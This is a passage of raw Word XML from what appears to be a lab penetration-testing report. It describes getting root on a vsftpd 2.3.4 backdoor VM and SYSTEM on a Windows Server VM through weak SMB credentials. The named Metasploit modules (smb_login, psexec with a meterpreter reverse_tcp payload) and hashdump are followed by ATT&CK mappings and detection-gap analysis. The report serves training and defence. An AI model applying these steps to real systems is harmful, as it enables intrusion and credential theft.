                  <wp:docPr id="20461388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38833" name="Picture 20461388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13EE59"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4: getuid output — Server username: root [06_EXPLOIT1_ROOT.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0275214E"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5B83DECE"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628B50A0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351E6477" wp14:editId="7DFD1A7D">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="19595793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79336" name="Picture 195957933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A0F92D"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5: /etc/passwd contents — all system accounts exfiltrated [08_exploit1_passwd.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D076C29" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CD4D3D" w14:textId="68091A3B" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.3 MITRE ATT&amp;CK Mapping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4"/>
        <w:gridCol w:w="2808"/>
        <w:gridCol w:w="4814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="6BD11278"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F19102C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</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2F8E6138" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481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0434774A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="2EDB5646"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EBE7576" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1046</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BAD110C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network Service Discovery</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973E9C1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap identified vsftpd 2.3.4 on port 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3C969A0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F898802" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</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A3380A1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application</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4DA7A67" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2011-2523 triggered via Metasploit — no auth required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7EF6078B"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8A106B7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1059.004</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8B8F71" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Command &amp; Scripting: Unix Shell</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0AD0B9" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Root shell obtained via Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="449268F7"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F8C647F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1005</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F81F80" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data from Local System</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DD304A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/etc/passwd read — full file system access confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD19CA7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67739319" w14:textId="797050C2" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF1D84" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This attack generated FTP traffic on port 21 followed by anomalous outbound traffic on port 6200. Without network monitoring or IDS rules for non-standard egress traffic, this activity went entirely undetected. No file integrity monitoring was present to flag the backdoored binary. Upgrading vsftpd to a patched version and implementing network egress filtering would have prevented this exploit completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C3F53" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A961BFC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBC5B4D" w14:textId="2DDE4D93" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Exploit 2 — SMB Credential Attack and PSExec Shell (VM-2: Windows Server 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407811F" w14:textId="38ADF827" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF16E89" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nmap confirmed port 445/tcp (SMB) open on 192.168.56.104. Windows Defender and the host firewall were found disabled — a misconfiguration consistent with a poorly managed server. The Administrator account used a weak password (Admin123) that did not comply with recommended complexity standards [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A434D"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4E3DEAD9"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7364D063" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F41944" wp14:editId="2D42FD53">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="20617525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52544" name="Picture 20617525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9B69FC"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6: Nmap — port 445/tcp open on Windows Server 2019 [WIN_09_nmap_scan.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38675BE0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703C806E" w14:textId="3171CF33" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Exploitation and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17F6EB" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The Metasploit auxiliary module auxiliary/scanner/smb/smb_login performed credential authentication against port 445, successfully confirming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Administrator:Admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>123. This methodology is consistent with the password-spraying techniques documented in current threat intelligence literature [5]. The Metasploit module exploit/windows/smb/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was then used with a windows/x64/meterpreter/reverse_tcp payload, establishing a Meterpreter session. getuid returned NT AUTHORITY\SYSTEM — the highest privilege level on Windows [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68720F"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640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="33EF7F5C"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27EC7760" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A774F3B" wp14:editId="09ECEFE1">
                  <wp:extent cx="5862348" cy="3474625"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="0"/>
                  <wp:docPr id="1049641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4144" name="Picture 10496414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1478" cy="3491891"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AC741E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 7: SMB login success — </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Administrator:Admin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>123 confirmed [WIN_11_smb_success.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05F5CBCF"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7826A1E9"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41988071" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C39C92E" wp14:editId="6D7E2DFB">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="3777694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69446" name="Picture 37776944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2844A64"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8: Meterpreter — NT AUTHORITY\SYSTEM access confirmed [WIN_12_meterpreter_system.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D1E61B3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11970C30" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> command extracted NTLM password hashes for all local accounts including Administrator, Guest, hacked, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WDAGUtilityAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> — usable for offline cracking or pass-the-hash attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB4029"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0E6F2E25"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2C9963F9" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCFFA04" wp14:editId="74DD6BD1">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="11252276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227665" name="Picture 112522766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9D23B2" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 9: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — NTLM hashes for all Windows accounts extracted [WIN_13_hashdump.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A4A0A0C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65704892" w14:textId="7F611348" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.3 MITRE ATT&amp;CK Mapping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4"/>
        <w:gridCol w:w="2808"/>
        <w:gridCol w:w="4814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="270FFA2E"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1F9CFD8E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
